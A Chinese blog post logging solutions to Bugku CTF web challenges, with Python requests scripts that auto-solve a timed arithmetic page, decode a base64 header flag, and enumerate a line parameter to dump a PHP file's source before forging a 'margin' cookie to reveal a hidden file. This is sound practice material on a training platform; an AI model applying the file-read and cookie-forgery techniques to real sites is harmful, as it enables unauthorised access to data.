CTF题目记录8

(还有坑没填好)

最近在刷bugku 感觉对新手还是挺友好的,同时也能学到不少东西,每日更新几题准备记录的吧(这次基本是脚本题)

秋名山老司机

亲请在2s内计算老司机的车速是多少(最基本的脚本题???)

这题很多平台上都有,脚本必练:request库,re库
一开始不知道哪里传值,但是post一个数据后就会有提示的,发现要post一个value参数
在这里插入图片描述

import requests
import re
url='http://123.206.87.240:8002/qiumingshan/'
s=requests.Session()
r=s.get(url)
r.encoding='utf-8'
print(r.text)
data1=re.findall(r'</p>\n<div>[\s\+\*-\?;]+</div>',r.text)
data2=''.join(data1) #把data1的list转为string类型

num=eval(data2.lstrip('</p>\n<div>').rstrip('=?;</div>'))
# print(str(num)) 测试一下
r=s.post(url,data={'value':num})#post一个value进去
r.encoding='utf-8'
print(r.text)

我这个(正则)写的挺糟糕的,不过够用= =

# 网上师傅写的,学习(正则啊!!)
import requests
s = requests.Session()
r = s.get("http://123.206.87.240:8002/qiumingshan/")
searchObj = re.search(r'(\d+[+\-*])+(\d+)', r.text)
d = {
    "value": eval(searchObj.group(0))
    }
r = s.post("http://123.206.87.240:8002/qiumingshan/", data=d)
print(r.text)

跑出flag在这里插入图片描述

sess = requests.Session( )

requests库的session会话对象可以跨请求保持某些参数,说白了,就是比如你使用session成功的登录了某个网站,则在再次使用该session对象请求该网站的其他网页都会默认使用该session之前使用的cookie等参数

速度要快

我的好像不够快???怎么跑不出来啊555先留个坑

import requests
import base64

url = 'http://123.206.87.240:8002/web6/'
s = requests.Session()
r = requests.get(url)
flag = r.headers['flag']  # headers是个字典
flag = base64.b64decode(flag)

flag = flag.decode('utf-8')[-8:]
#print(flag)
flag = base64.b64decode(flag).decode('utf-8')
#print(flag)

r = s.post(url, data={'margin': flag})
print(r.text)

# 网上瞟的
import requests
import base64
url="http://123.206.87.240:8002/web6/"
s=requests.Session()
head=s.get(url).headers
flag=base64.b64decode(head["flag"])
flag=flag.decode()
key=base64.b64decode(flag.split(":")[1])
payload={"margin": key}
print(s.post(url,data=payload).text)

cookies欺骗

在这里插入图片描述
一串可疑base64,解码:keys.txt

然后访问了一下文件:rfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibryrfrgrggggggoaihegfdiofi48ty598whrefeoiahfeiafehbaienvdivrbgtubgtrsgbvaerubaufibry
好像没啥用的
(其实是发现filename=keys.txt时会显示内容,所以我们传入新的filename=index.php,base64加密后为aW5kZXgucGhw,再尝试line=1,2…)脚本把所有内容都爆破出来。。。(这个脑洞我没想到,不过我发现这个还挺常见的脑洞)

import requests
for id in range(1,100):
    url = 'http://123.206.87.240:8002/web11/index.php?line=' + str(id) + '&filename=aW5kZXgucGhw'
    r=requests.get(url)
    print(r.text)
error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

传入cookie:margin=margin,查看源码即可

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值